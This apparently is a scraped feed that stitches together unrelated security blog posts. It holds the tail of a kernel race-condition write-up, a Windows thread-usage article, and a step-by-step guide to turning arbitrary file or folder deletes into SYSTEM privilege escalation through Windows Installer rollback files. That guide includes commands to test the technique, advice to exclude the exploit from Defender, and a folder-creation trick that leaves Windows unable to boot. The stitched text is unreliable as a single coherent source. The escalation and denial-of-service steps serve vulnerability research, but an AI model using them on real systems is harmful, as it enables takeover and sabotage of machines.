 alloc_debug_processing+0xd5/0x130

 ___slab_alloc+0x511/0x570

[...]

 __slab_alloc+0x1c/0x30

 kmem_cache_alloc_node+0x1f3/0x210

 __alloc_skb+0x46/0x1f0

 alloc_skb_with_frags+0x4d/0x1b0

 sock_alloc_send_pskb+0x1f3/0x220

[...]

 unix_stream_sendmsg+0x268/0x4d0

 sock_sendmsg+0x5e/0x60

 ____sys_sendmsg+0x22e/0x270

[...]

 ___sys_sendmsg+0x75/0xb0

[...]

 __sys_sendmsg+0x59/0xa0

 do_syscall_64+0x33/0x80

 entry_SYSCALL_64_after_hwframe+0x44/0xa9

[...]

FIX skbuff_head_cache: Restoring 0x00000000d7142451-0x00000000d7142451=0x6b

FIX skbuff_head_cache: Marking all objects used

RIP: 0010:unix_stream_read_generic+0x72b/0x870

Code: fe ff ff 31 ff e8 85 87 91 ff e9 a5 fe ff ff 45 01 77 44 8b 83 80 01 00 00 85 c0 0f 89 10 01 00 00 49 8b 47 38 48 85 c0 74 23 <0f> bf 00 66 85 c0 0f 85 20 01 00 00 4c 89 fe 48 8d 7c 24 58 44 89

RSP: 0018:ffffb789027f7cf0 EFLAGS: 00010202

RAX: 6b6b6b6b6b6b6b6b RBX: ffff982d1d897b40 RCX: 0000000000000000

RDX: 6a0fe1820359dce8 RSI: ffffffffa81f9ba0 RDI: 0000000000000246

RBP: ffff982d1d897ea8 R08: 0000000000000000 R09: 0000000000000000

R10: 0000000000000000 R11: ffff982d2645c900 R12: ffffb789027f7dd0

R13: ffff982d1d897c10 R14: 0000000000000001 R15: ffff982d3390e000

FS:  00007f547209d740(0000) GS:ffff98309fa40000(0000) knlGS:0000000000000000

CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033

CR2: 00007f54722cd000 CR3: 00000001b61f4002 CR4: 0000000000770ee0

PKRU: 55555554

Conclusion(s)

Hitting a race can become easier if, instead of racing two threads against each other, you race one thread against a hardware timer to create a gigantic timing window for the other thread. Hence the title! On the other hand, it introduces extra complexity because now you have to think about how timers actually work, and turns out, time is a complicated concept...

This shows how at least some really tight races can still be hit and we should treat them as security bugs, even if it seems like they'd be very hard to hit at first glance.

Also, precisely timing races is hard, and the details of how long it actually takes the CPU to get from one point to another are mysterious. (As not only exploit writers know, but also anyone who's ever wanted to benchmark a performance-relevant change...)

Appendix: How impatient are interrupts?

I did also play around with this stuff on arm64 a bit, and I was wondering: At what points do interrupts actually get delivered? Does an incoming interrupt force the CPU to drop everything immediately, or do inflight operations finish first? This gets particularly interesting on phones that contain two or three different types of CPUs mixed together.

On a Pixel 4 (which has 4 slow in-order cores, 3 fast cores, and 1 faster core), I tried firing an interval timer at 100Hz (using timer_create()), with a signal handler that logs the PC register, while running this loop:

  400680:        91000442         add        x2, x2, #0x1

  400684:        91000421         add        x1, x1, #0x1

  400688:        9ac20820         udiv        x0, x1, x2

  40068c:        91006800         add        x0, x0, #0x1a

  400690:        91000400         add        x0, x0, #0x1

  400694:        91000442         add        x2, x2, #0x1

  400698:        91000421         add        x1, x1, #0x1

  40069c:        91000442         add        x2, x2, #0x1

  4006a0:        91000421         add        x1, x1, #0x1

  4006a4:        9ac20820         udiv        x0, x1, x2

  4006a8:        91006800         add        x0, x0, #0x1a

  4006ac:        91000400         add        x0, x0, #0x1

  4006b0:        91000442         add        x2, x2, #0x1

  4006b4:        91000421         add        x1, x1, #0x1

  4006b8:        91000442         add        x2, x2, #0x1

  4006bc:        91000421         add        x1, x1, #0x1

  4006c0:        17fffff0         b        400680 <main+0xe0>

The logged interrupt PCs had the following distribution on a slow in-order core:

A histogram of PC register values, where most instructions in the loop have roughly equal frequency, the instructions after udiv instructions have twice the frequency, and two other instructions have zero frequency.

and this distribution on a fast out-of-order core:

A histogram of PC register values, where the first instruction of the loop has very high frequency, the following 4 instructions have near-zero frequency, and the following instructions have low frequencies

As always, out-of-order (OOO) cores make everything weird, and the start of the loop seems to somehow "provide cover" for the following instructions; but on the in-order core, we can see that more interrupts arrive after the slow udiv instructions. So apparently, when one of those is executing while an interrupt arrives, it continues executing and doesn't get aborted somehow?

With the following loop, which has a LDR instruction mixed in that accesses a memory location that is constantly being modified by another thread:

  4006a0:        91000442         add        x2, x2, #0x1

  4006a4:        91000421         add        x1, x1, #0x1

  4006a8:        9ac20820         udiv        x0, x1, x2

  4006ac:        91006800         add        x0, x0, #0x1a

  4006b0:        91000400         add        x0, x0, #0x1

  4006b4:        91000442         add        x2, x2, #0x1

  4006b8:        91000421         add        x1, x1, #0x1

  4006bc:        91000442         add        x2, x2, #0x1

  4006c0:        91000421         add        x1, x1, #0x1

  4006c4:        9ac20820         udiv        x0, x1, x2

  4006c8:        91006800         add        x0, x0, #0x1a

  4006cc:        91000400         add        x0, x0, #0x1

  4006d0:        91000442         add        x2, x2, #0x1

  4006d4:        f9400061         ldr        x1, [x3]

  4006d8:        91000421         add        x1, x1, #0x1

  4006dc:        91000442         add        x2, x2, #0x1

  4006e0:        91000421         add        x1, x1, #0x1

  4006e4:        17ffffef         b        4006a0 <main+0x100>

the cache-missing loads obviously have a large influence on the timing. On the in-order core:

A histogram of interrupt instruction pointers, showing that most interrupts are delivered with PC pointing to the instruction after the high-latency load instruction.

On the OOO core:

A similar histogram as the previous one, except that an even larger fraction of interrupt PCs are after the high-latency load instruction.

What is interesting to me here is that the timer interrupts seem to again arrive after the slow load - implying that if an interrupt arrives while a slow memory access is in progress, the interrupt handler may not get to execute until the memory access has finished? (Unless maybe on the OOO core the interrupt handler can start speculating already? I wouldn't really expect that, but could imagine it.)

On an X86 Skylake CPU, we can do a similar test:

    11b8:        48 83 c3 01                  add    $0x1,%rbx

    11bc:        48 83 c0 01                  add    $0x1,%rax

    11c0:        48 01 d8                     add    %rbx,%rax

    11c3:        48 83 c3 01                  add    $0x1,%rbx

    11c7:        48 83 c0 01                  add    $0x1,%rax

    11cb:        48 01 d8                     add    %rbx,%rax

    11ce:        48 03 02                     add    (%rdx),%rax

    11d1:        48 83 c0 01                  add    $0x1,%rax

    11d5:        48 83 c3 01                  add    $0x1,%rbx

    11d9:        48 01 d8                     add    %rbx,%rax

    11dc:        48 83 c3 01                  add    $0x1,%rbx

    11e0:        48 83 c0 01                  add    $0x1,%rax

    11e4:        48 01 d8                     add    %rbx,%rax

    11e7:        eb cf                        jmp    11b8 <main+0xf8>

with a similar result:

A histogram of interrupt instruction pointers, showing that almost all interrupts were delivered with RIP pointing to the instruction after the high-latency load.

This means that if the first access to the file terminated our race window (which is not the case), we probably wouldn't be able to win the race by making the access to the file slow - instead we'd have to slow down one of the operations before that. (But note that I have only tested simple loads, not stores or read-modify-write operations here.)

Reversing embedded device bootloader (U-Boot) - p.2

21 March 2022 at 11:00
This blog post is not intended to be a “101” ARM firmware reverse-engineering tutorial or a guide to attacking a specific IoT device. The goal is to share our experience and, why not, perhaps save you some precious hours and headaches. Sum up The first post dealt with some more theoretical aspects at a very low level, instead this one will show how we finally decrypted the kernel image. DO NOT PANIC - we will not be as long-winded as in the first post.

Threads, Threads, and More Threads

21 March 2022 at 11:00

Looking at a typical Windows system shows thousands of threads, with process numbers in the hundreds, even though the total CPU consumption is low, meaning most of these threads are doing nothing most of the time. I typically rant about it in my Windows Internals classes. Why so many threads?

Here is a snapshot of my Task Manager showing the total number of threads and processes:

Showing processes details and sorting by thread count looks something like this:

The System process clearly has many threads. These are kernel threads created by the kernel itself and by device drivers. These threads are always running in kernel mode. For this post, I’ll disregard the System process and focus on “normal” user-mode processes.

There are other kernel processes that we should ignore, such as Registry and Memory Compression. Registry has few threads, but Memory Compression has many. It’s not shown in Task Manager (by design), but is shown in other tools, such as Process Explorer. While I’m writing this post, it has 78 threads. We should probably skip that process as well as being “out of our control”.

Notice the large number of threads in processes running the images Explorer.exe, SearchIndexer.exe, Nvidia Web helper.exe, Outlook.exe, Powerpnt.exe and MsMpEng.exe. Let’s write some code to calculate the average number of threads in a process and the standard deviation:

float ComputeStdDev(std::vector<int> const& values, float& average) {
	float total = 0;
	std::for_each(values.begin(), values.end(), 
		[&](int n) { total += n; });
	average = total / values.size();
	total = 0;
	std::for_each(values.begin(), values.end(), 
		[&](int n) { total += (n - average) * (n - average); });
	return std::sqrt(total / values.size());
}

int main() {
	auto hSnapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	
	PROCESSENTRY32 pe;
	pe.dwSize = sizeof(pe);

	// skip the idle process
	::Process32First(hSnapshot, &pe);

	int processes = 0, threads = 0;
	std::vector<int> threads_per_process;
	threads_per_process.reserve(500);
	while (::Process32Next(hSnapshot, &pe)) {
		processes++;
		threads += pe.cntThreads;
		threads_per_process.push_back(pe.cntThreads);
	}
	::CloseHandle(hSnapshot);

	assert(processes == threads_per_process.size());

	printf("Process: %d Threads: %d\n", processes, threads);
	float average;
	auto sd = ComputeStdDev(threads_per_process, average);
	printf("Average threads/process: %.2f\n", average);
	printf("Std. Dev.: %.2f\n", sd);

	return 0;
}

The ComputeStdDev function computes the standard deviation and average of a vector of integers. The main function uses the ToolHelp API to enumerate processes in the system, which fortunately also provides the number of threads in each processes (stored in the threads_per_process vector. If I run this (no processes removed just yet), this is what I get:

Process: 525 Threads: 7810
Average threads/process: 14.88
Std. Dev.: 23.38

Almost 15 threads per process, with little CPU consumption in my Task Manager. The standard deviation is more telling – it’s big compared to the average, which suggests that many processes are far from the average in their thread consumption. And since a negative thread count is not possible (even zero is almost impossible), the the divergence is with higher thread numbers.

To be fair, let’s remove the System and Memory Compression processes from our calculations. Here are the changes to the while loop:

while (::Process32Next(hSnapshot, &pe)) {
	if (pe.th32ProcessID == 4 || _wcsicmp(pe.szExeFile, L"memory compression") == 0)
		continue;
//...

Here are the results:

Process: 521 Threads: 7412
Average threads/process: 14.23
Std. Dev.: 14.14

The standard deviation is definitely smaller, but still pretty big (close to the average), which does not invalidate the previous point. Some processes use lots of threads.

In an ideal world, the number of threads in a system would be the same as the number of logical processors – any more and threads might fight over processors, any less and you’re not using the full power of the machine. Obviously, each “normal” process must have at least one thread running whatever main function is available in the executable, so on my system 521 threads would be the minimum number of threads. Still – we have over 7000.

What are these threads doing, anyway? Let’s examine some processes. First, an Explorer.exe process. Here is the Threads tab shown in Process Explorer:

Thread list in Explorer.exe instance

93 threads. I’ve sorted the list by Start Address to get a sense of the common functions used. Let’s dig into some of them. One of the most common (in other processes as well) is ntdll!TppWorkerThread – this is a thread pool thread, likely waiting for work. Clicking the Stack button (or double clicking the entry in the list) shows the following call stack:

ntoskrnl.exe!KiSwapContext+0x76
ntoskrnl.exe!KiSwapThread+0x500
ntoskrnl.exe!KiCommitThreadWait+0x14f
ntoskrnl.exe!KeWaitForSingleObject+0x233
ntoskrnl.exe!KiSchedulerApc+0x3bd
ntoskrnl.exe!KiDeliverApc+0x2e9
ntoskrnl.exe!KiSwapThread+0x827
ntoskrnl.exe!KiCommitThreadWait+0x14f
ntoskrnl.exe!KeRemoveQueueEx+0x263
ntoskrnl.exe!IoRemoveIoCompletion+0x98
ntoskrnl.exe!NtWaitForWorkViaWorkerFactory+0x38e
ntoskrnl.exe!KiSystemServiceCopyEnd+0x25
ntdll.dll!ZwWaitForWorkViaWorkerFactory+0x14
ntdll.dll!TppWorkerThread+0x2f7
KERNEL32.DLL!BaseThreadInitThunk+0x14
ntdll.dll!RtlUserThreadStart+0x21

The system call NtWaitForWorkViaWorkerFactory is the one waiting for work (the name Worker Factory is the internal name of the thread pool type in the kernel, officially called TpWorkerFactory). The number of such threads is typically dynamic, growing and shrinking based on the amount of work provided to the thread pool(s). The minimum and maximum threads can be tweaked by APIs, but most processes are unlikely to do so.

Another function that appears a lot in the list is shcore.dll!_WrapperThreadProc. It looks like some generic function used by Explorer for its own threads. We can examine some call stacks to get a sense of what’s going on. Here is one:

ntoskrnl.exe!KiSwapContext+0x76
ntoskrnl.exe!KiSwapThread+0x500
ntoskrnl.exe!KiCommitThreadWait+0x14f
ntoskrnl.exe!KeWaitForSingleObject+0x233
ntoskrnl.exe!KiSchedulerApc+0x3bd
ntoskrnl.exe!KiDeliverApc+0x2e9
ntoskrnl.exe!KiSwapThread+0x827
ntoskrnl.exe!KiCommitThreadWait+0x14f
ntoskrnl.exe!KeWaitForSingleObject+0x233
ntoskrnl.exe!KeWaitForMultipleObjects+0x45b
win32kfull.sys!xxxRealSleepThread+0x362
win32kfull.sys!xxxSleepThread2+0xb5
win32kfull.sys!xxxRealInternalGetMessage+0xcfd
win32kfull.sys!NtUserGetMessage+0x92
win32k.sys!NtUserGetMessage+0x16
ntoskrnl.exe!KiSystemServiceCopyEnd+0x25
win32u.dll!NtUserGetMessage+0x14
USER32.dll!GetMessageW+0x2e
SHELL32.dll!_LocalServerThread+0x66
shcore.dll!_WrapperThreadProc+0xe9
KERNEL32.DLL!BaseThreadInitThunk+0x14
ntdll.dll!RtlUserThreadStart+0x21

This one seems to be waiting for UI messages, probably managing some user interface (GetMessage). We can verify with other tools. Here is my own WinSpy:

Apparently, I was wrong. This thread has the hidden window type used to receive messages targeting COM objects that leave in this Single Threaded Apartment (STA).

We can inspect WinSpy some more to see the threads and windows created by Explorer. I’ll leave that to the interested reader.

Other generic call stacks start with ucrtbase.dll!thread_start+0x42. Many of them have the following call stack (kernel part trimmed for brevity):

ntdll.dll!ZwWaitForMultipleObjects+0x14
KERNELBASE.dll!WaitForMultipleObjectsEx+0xf0
KERNELBASE.dll!WaitForMultipleObjects+0xe
cdp.dll!shared::CallbackNotifierListener::ListenerInternal::StartInternal+0x9f
cdp.dll!std::thread::_Invoke<std::tuple<<lambda_10793e1829a048bb2f8cc95974633b56> >,0>+0x2f
ucrtbase.dll!thread_start<unsigned int (__cdecl*)(void *),1>+0x42
KERNEL32.DLL!BaseThreadInitThunk+0x14
ntdll.dll!RtlUserThreadStart+0x21

A function in CDP.dll is waiting for something (WaitForMultipleObjects). I count at least 12 threads doing just that. Perhaps all these waits could be consolidated to a smaller number of threads?

Let’s tackle a different process. Here is an instance of Teams.exe. My teams is minimized to the tray and I have not interacted with it for a while:

Teams threads

62 threads. Many have the same CRT wrapper for a thread created by Teams. Here are several call stacks I observed:

ntdll.dll!ZwRemoveIoCompletion+0x14
KERNELBASE.dll!GetQueuedCompletionStatus+0x4f
skypert.dll!rtnet::internal::SingleThreadIOCP::iocpLoop+0x116
skypert.dll!SplOpaqueUpperLayerThread::run+0x84
skypert.dll!auf::priv::MRMWTransport::process1+0x6c
skypert.dll!auf::ThreadPoolExecutorImp::workLoop+0x160
skypert.dll!auf::tpImpThreadTrampoline+0x47
skypert.dll!spl::threadWinDispatch+0x19
skypert.dll!spl::threadWinEntry+0x17b
ucrtbase.dll!thread_start<unsigned int (__cdecl*)(void *),1>+0x42
KERNEL32.DLL!BaseThreadInitThunk+0x14
ntdll.dll!RtlUserThreadStart+0x21
ntdll.dll!ZwWaitForAlertByThreadId+0x14
ntdll.dll!RtlSleepConditionVariableCS+0x105
KERNELBASE.dll!SleepConditionVariableCS+0x29
Teams.exe!uv_cond_wait+0x10
Teams.exe!worker+0x8d
Teams.exe!uv__thread_start+0xa2
Teams.exe!thread_start<unsigned int (__cdecl*)(void *),1>+0x50
KERNEL32.DLL!BaseThreadInitThunk+0x14
ntdll.dll!RtlUserThreadStart+0x21

You can check more threads, but you get the idea. Most threads are waiting for something – this is not the ideal activity for a thread. A thread should run (useful) code.

Last example, Word:

57 threads. Word has been minimized for more than an hour now. The clearly common call stack looks like this:

ntdll.dll!ZwWaitForAlertByThreadId+0x14
ntdll.dll!RtlSleepConditionVariableSRW+0x131
KERNELBASE.dll!SleepConditionVariableSRW+0x29
v8jsi.dll!CrashForExceptionInNonABICompliantCodeRange+0x4092f6
v8jsi.dll!CrashForExceptionInNonABICompliantCodeRange+0x11ff2
v8jsi.dll!v8_inspector::V8StackTrace::topScriptIdAsInteger+0x43ad0
ucrtbase.dll!thread_start<unsigned int (__cdecl*)(void *),1>+0x42
KERNEL32.DLL!BaseThreadInitThunk+0x14
ntdll.dll!RtlUserThreadStart+0x21

v8jsi.dll is the React Native v8 engine – it’s creating many threads, most of which are doing nothing. I found it in Outlook and PowerPoint as well.

Many applications today depend on various libraries and frameworks, some of which don’t seem to care too much about using threads economically – examples include Node.js, the Electron framework, even Java and .NET. Threads are not free – there is the ETHREAD and related data structures in the kernel, stack in kernel space, and stack in user space. Context switches and code run by the kernel scheduler when threads change states from Running to Waiting, and from Waiting to Ready are not free, either.

Many desktop/laptop systems today are very powerful and it might seem everything is fine. I don’t think so. Developers use so many layers of abstraction these days, that we sometimes forget there are actual processors that execute the code, and need to use memory and other resources. None of that is free.

image-1

zodiacon

About

17 March 2022 at 00:00
Au sein du groupe THALES, l’équipe THALIUM - basée à Rennes - est dédiée aux activités de Lutte Informatique, de connaissance de la menace, de recherche de vulnérabilités et de développement d’outils de type Red Team. Nous recrutons !! Thalium, part of THALES group, is focused on threat intelligence, vulnerability research and red team development.

Abusing Arbitrary File Deletes to Escalate Privilege and Other Great Tricks

What do you do when you’ve found an arbitrary file delete as NT AUTHORITY\SYSTEM? Probably just sigh and call it a DoS. Well, no more. In this article, we’ll show you some great techniques for getting much more out of your arbitrary file deletes, arbitrary folder deletes, and other seemingly low-impact filesystem-based exploit primitives.

The Trouble with Arbitrary File Deletes

When you consider how to leverage an arbitrary file delete on Windows, two great obstacles present themselves:

  1. Most critical Windows OS files are locked down with DACLs that prevent modification even by SYSTEM. Instead, most OS files are owned by TrustedInstaller, and only that account has permission to modify them. (Exercise for the reader: Find the critical Windows OS files that can still be deleted or overwritten by SYSTEM!)
  2. Even if you find a file that you can delete as SYSTEM, it needs to be something that causes a “fail-open” (degradation of security) if deleted.

A third problem that can arise is that some critical system files are inaccessible at all times due to sharing violations.

Experience shows that finding a file to delete that meets all the above criteria is very hard. When looking in the usual places, which would be within C:\Windows, C:\Program Files or C:\Program Data, we’re not aware of anything that fits the bill. There is some prior work that involves exploiting antivirus and other products, but this is dependent on vulnerable behavior in those products.

The Solution is Found Elsewhere: Windows Installer

In March of 2021, we received a vulnerability report from researcher Abdelhamid Naceri (halov). The vulnerability he reported was an arbitrary file delete in the User Profile service, running as SYSTEM. Remarkably, his submission also included a technique to parlay this file delete into an escalation of privilege (EoP), resulting in a command prompt running as SYSTEM. The EoP works by deleting a file, but not in any of the locations you would usually think of.

To understand the route to privilege escalation, we need to explain a bit about the operation of the Windows Installer service. The following explanation is simplified somewhat.

The Windows Installer service is responsible for performing installations of applications. An application author supplies an .msi file, which is a database defining the changes that must be made to install the application: folders to be created, files to be copied, registry keys to be modified, custom actions to be executed, and so forth.

To ensure that system integrity is maintained when an installation cannot be completed, and to make it possible to revert an installation cleanly, the Windows Installer service enforces transactionality. Each time it makes a change to the system, Windows Installer makes a record of the change, and each time it overwrites an existing file on the system with a newer version from the package being installed, it retains a copy of the older version. In case the install needs to be rolled back, these records allow the Windows Installer service to restore the system to its original state. In the simplest scenario, the location for these records is a folder named C:\Config.Msi.

During an installation, the Windows Installer service creates a folder named C:\Config.Msi and populates it with rollback information. Whenever the install process makes a change to the system, Windows Installer records the change in a file of type .rbs (rollback script) within C:\Config.Msi. Additionally, whenever the install overwrites an older version of some file with a newer version, Windows Installer will place a copy of the original file within C:\Config.Msi. This type of a file will be given the .rbf (rollback file) extension. In case an incomplete install needs to be rolled back, the service will read the .rbs and .rbf files and use them to revert the system to the state that existed before the install.

This mechanism must be protected against tampering. If a malicious user were able to alter the .rbs and/or .rbf files before they are read, arbitrary changes to the state of the system could occur during rollback. Therefore, Windows Installer sets a strong DACL on C:\Config.Msi and the enclosed files.

Here is where an opening arises, though: What if an attacker has an arbitrary folder delete vulnerability? They can use it to completely remove C:\Config.Msi immediately after Windows Installer creates it. The attacker can then recreate C:\Config.Msi with a weak DACL (note that ordinary users are allowed to create folders at the root of C:\). Once Windows Installer creates its rollback files within C:\Config.Msi, the attacker will be able to replace C:\Config.Msi with a fraudulent version that contains attacker-specified .rbs and .rbf files. Then, upon rollback, Windows Installer will make arbitrary changes to the system, as specified in the malicious rollback scripts.

Note that the only required exploit primitive here is the ability to delete an empty folder. Moving or renaming the folder works equally well.

From Arbitrary Folder Delete/Move/Rename to SYSTEM EoP

In conjunction with this article, we are releasing source code for Abdelhamid Naceri’s privilege escalation technique. This exploit has wide applicability in cases where you have a primitive for deleting, moving, or renaming an arbitrary empty folder in the context of SYSTEM or an administrator. The exploit should be built in the Release configuration for either x64 or x86 to match the architecture of the target system. Upon running the exploit, it will prompt you to initiate a delete of C:\Config.Msi. You can do this by triggering an arbitrary folder delete vulnerability, or, for testing purposes, you can simply run rmdir C:\Config.Msi from an elevated command prompt. Upon a successful run, the exploit will drop a file to C:\Program Files\Common Files\microsoft shared\ink\HID.DLL. You can then get a SYSTEM command prompt by starting the On-Screen Keyboard osk.exe and then switching to the Secure Desktop, for example by pressing Ctrl-Alt-Delete.

The exploit contains an .msi file. The main thing that’s special about this .msi is that it contains two custom actions: one that produces a short delay, and a second that throws an error. When the Windows Installer service tries to install this .msi, the installation will halt midway and rollback. By the time the rollback begins, the exploit will have replaced the contents of C:\Config.Msi with a malicious .rbs and .rbf. The .rbf contains the bits of the malicious HID.DLL, and the .rbs instructs Windows Installer to “restore” it to our desired location (C:\Program Files\Common Files\microsoft shared\ink\).

The full mechanism of the EoP exploit is as follows:

  1. The EoP creates a dummy C:\Config.Msi and sets an oplock.
  2. The attacker triggers the folder delete vulnerability to delete C:\Config.Msi (or move C:\Config.Msi elsewhere) in the context of SYSTEM (or admin). Due to the oplock, the SYSTEM process is forced to wait.
  3. Within the EoP, the oplock callback is invoked. The following several steps take place within the callback.
  4. The EoP moves the dummy C:\Config.Msi elsewhere. This is done so that the oplock remains in place and the vulnerable process is forced to continue waiting, while the filesystem location C:\Config.Msi becomes available for other purposes (see further).
  5. The EoP spawns a new thread that invokes the Windows Installer service to install the .msi, with UI disabled.
  6. The callback thread of the EoP continues and begins polling for the existence of C:\Config.Msi. For reasons that are not clear to me, Windows Installer will create C:\Config.Msi, use it briefly for a temp file, delete it, and then create it a second time to use for rollback scripts. The callback thread polls C:\Config.Msi to wait for each of these actions to take place.
  7. As soon as the EoP detects that Windows Installer has created C:\Config.Msi for the second time, the callback thread exits, releasing the oplock. This allows the vulnerable process to proceed and delete (or move, or rename) the C:\Config.Msi created by Windows Installer.
  8. The EoP main thread resumes. It repeatedly attempts to create C:\Config.Msi with a weak DACL. As soon as the vulnerable process deletes (or moves, or renames) C:\Config.Msi, the EoP’s create operation succeeds.
  9. The EoP watches the contents of C:\Config.Msi and waits for Windows Installer to create an .rbs file there.
  10. The EoP repeatedly attempts to move C:\Config.Msi elsewhere. As soon as Windows Installer closes its handle to the .rbs, the move succeeds, and the EoP proceeds.
  11. The EoP creates C:\Config.Msi one final time. Within it, it places a malicious .rbs file having the same name as the original .rbs. Together with the .rbs, it writes a malicious .rbf.
  12. After the delay and the error action specified in the .msi, Windows Installer performs a rollback. It consumes the malicious .rbs and .rbf, dropping the DLL.

Note that at step 7, there is a race condition that sometimes causes problems. If the vulnerable process does not immediately awaken and delete C:\Config.Msi, the window of opportunity may be lost because Windows Installer will soon open a handle to C:\Config.Msi and begin writing an .rbs there. At that point, deleting C:\Config.Msi will no longer work, because it is not an empty folder. To avoid this, it is recommended to run the EoP on a system with a minimum of 4 processor cores. A quiet system, where not much other activity is taking place, is probably ideal. If you do experience a failure, it will be necessary to retry the EoP and trigger the vulnerability a second time.

From Arbitrary File Delete to SYSTEM EoP

The technique described above assumes a primitive that deletes an arbitrary empty folder. Often, though, one has a file delete primitive as opposed to a folder delete primitive. That was the case with Abdelhamid Naceri’s User Profile bug. To achieve SYSTEM EoP in this case, his exploit used one additional trick, which we will now explain.

In NTFS, the metadata (index data) associated with a folder is stored in an alternate data stream on that folder. If the folder is named C:\MyFolder, then the index data is found in a stream referred to as C:\MyFolder::$INDEX_ALLOCATION. Some implementation details can be found here. For our purposes, though, what we need to know is this: deleting the ::$INDEX_ALLOCATION stream of a folder effectively deletes the folder from the filesystem, and a stream name, such as C:\MyFolder::$INDEX_ALLOCATION, can be passed to APIs that expect the name of a file, including DeleteFileW.

So, if you are able to get a process running as SYSTEM or admin to pass an arbitrary string to DeleteFileW, then you can use it not only as a file delete primitive but also as a folder delete primitive. From there, you can get a SYSTEM EoP using the exploit technique discussed above. In our case, the string you want to pass is C:\Config.Msi::$INDEX_ALLOCATION.

Be advised that success depends on the particular code present in the vulnerable process. If the vulnerable process simply calls DeleteFileA/DeleteFileW, you should be fine. In other cases, though, the privileged process performs other associated actions, such as checking the attributes of the specified file. This is why you cannot test this scenario from the command prompt by running del C:\Config.Msi::$INDEX_ALLOCATION.

From Folder Contents Delete to SYSTEM EoP

Leveling up once more, let us suppose that the vulnerable SYSTEM process does not allow us to specify an arbitrary folder or file to be deleted, but we can get it to delete the contents of an arbitrary folder, or alternatively, to recursively delete files from an attacker-writable folder. Can this also be used for EoP? Researcher Abdelhamid Naceri demonstrated this as well, in a subsequent submission in July 2021. In this submission he detailed a vulnerability in the SilentCleanup scheduled task, running as SYSTEM. This task iterates over the contents of a temp folder and deletes each file it finds there. His technique was as follows:

  1. Create a subfolder, temp\folder1.
  2. Create a file, temp\folder1\file1.txt.
  3. Set an oplock on temp\folder1\file1.txt.
  4. Wait for the vulnerable process to enumerate the contents of temp\folder1 and try to delete the file file1.txt it finds there. This will trigger the oplock.
  5. When the oplock triggers, perform the following in the callback:
    a. Move file1.txt elsewhere, so that temp\folder1 is empty and can be deleted. We move file1.txt as opposed to just deleting it because deleting it would require us to first release the oplock. This way, we maintain the oplock so that the vulnerable process continues to wait, while we perform the next step.
    b. Recreate temp\folder1 as a junction to the ‘\RPC Controlfolder of the object namespace. c. Create a symlink at\RPC Control\file1.txtpointing toC:\Config.Msi::$INDEX_ALLOCATION`.
  6. When the callback completes, the oplock is released and the vulnerable process continues execution. The delete of file1.txt becomes a delete of C:\Config.Msi.

Readers may recognize the symlink technique involving \RPC Control from James Forshaw’s symboliclink-testing-tools. Note, though, that it’s not sufficient to set up the junction from temp\folder1 to \RPC Control and then let the arbitrary file delete vulnerability do its thing. That’s because \RPC Control is not an enumerable file system location, so the vulnerable process would not be able to find \RPC Control\file1.txt via enumeration. Instead, we must start off by creating temp\folder1\file1.txt as a bona fide file, allowing the vulnerable process to find it through enumeration. Only afterward, just as the vulnerable process attempts to open the file for deletion, we turn temp\folder1 into a junction pointing into the object namespace.

For working exploit code, see project FolderContentsDeleteToFolderDelete. Note that the built-in malware detection in Windows will flag this process and shut it down. I recommend adding a “Process” exclusion for FolderContentsDeleteToFolderDelete.exe.

You can chain these two exploits together. To begin, run FolderOrFileDeleteToSystem and wait for it to prompt you to trigger privileged deletion of Config.Msi. Then, run FolderContentsDeleteToFolderDelete /target C:\Config.Msi. It will prompt you to trigger privileged deletion of the contents of C:\test1. If necessary for your exploit primitive, you can customize this location using the /initial command-line switch. For testing purposes, you can simulate the privileged folder contents deletion primitive by running del /q C:\test1\* from an elevated command prompt. FolderContentsDeleteToFolderDelete will turn this into a delete of C:\Config.Msi, and this will enable FolderOrFileDeleteToSystem to drop the HID.DLL. Finally, open the On-Screen Keyboard and hit Ctrl-Alt-Delete for your SYSTEM shell.

From Arbitrary Folder Create to Permanent DoS

Before closing, we’d like to share one more technique we learned from this same researcher. Suppose you have an exploit primitive for creating an arbitrary folder as SYSTEM or admin. Unless the folder is created with a weak DACL, it doesn’t sound like this would be something that could have any security impact at all. Surprisingly, though, it does: it can be used for a powerful denial of service. The trick is to create a folder such as this one:

      C:\Windows\System32\cng.sys

Normally there is no file or folder by that name. If an attacker name squats on that filesystem location with an extraneous file or even an empty folder, the Windows boot process is disrupted. The exact mechanism is a bit of a mystery. It would appear that Windows attempts to load the cng.sys kernel module from the improper location and fails, and there is no retry logic that allows it to continue and locate the proper driver. The result is a complete inability to boot the system. Other drivers can be used as well for the same effect.

Depending on the vulnerability at hand, this DoS exploit could even be a remote DoS, as nothing is required besides the ability to drop a single folder or file.

Conclusion

The techniques we’ve presented here show how some rather weak exploit primitives can be used for great effect. We have learned that:

• An arbitrary folder delete/move/rename (even of an empty folder), as SYSTEM or admin, can be used to escalate to SYSTEM.
• An arbitrary file delete, as SYSTEM or admin, can usually be used to escalate to SYSTEM.
• A delete of contents of an arbitrary folder, as SYSTEM or admin, can be used to escalate to SYSTEM.
• A recursive delete, as SYSTEM or admin, of contents of a fixed but attacker-writable folder (such as a temp folder), can be used to escalate to SYSTEM.
• An arbitrary folder create, as SYSTEM or admin, can be used for a permanent system denial-of-service.
• An arbitrary file delete or overwrite, as SYSTEM or admin, even if there is no control of contents, can be used for a permanent system denial-of-service.

We would like to thank researcher Abdelhamid Naceri for his great work in developing these exploit techniques, as well as for the vulnerabilities he has been reporting to our program. We look forward to seeing more from him in the future. Until then, you can find me on Twitter at @HexKitchen, and follow the team for the latest in exploit techniques and security patches.

Abusing Arbitrary File Deletes to Escalate Privilege and Other Great Tricks

利用 gateway-api 攻击 kubernetes

By: lazydog
17 March 2022 at 11:40

前言

前几天注意到了 istio 官方公告,有一个利用 kubernetes gateway api 仅有 CREATE 权限来完成特权提升的漏洞(CVE-2022-21701),看公告、diff patch 也没看出什么名堂来,跟着自己感觉猜测了一下利用方法,实际跟下来发现涉及到了 sidecar 注入原理及 depolyments 传递注解的特性,个人觉得还是比较有趣的所以记录一下,不过有个插曲,复现后发现这条利用链可以在已经修复的版本上利用,于是和 istio security 团队进行了“友好”的沟通,最终发现小丑竟是我自己,自己yy的利用只是官方文档一笔带过的一个 feature。

所以通篇权当一个 controller 的攻击面,还有一些好玩的特性科普文看好了

istio sidecar injection

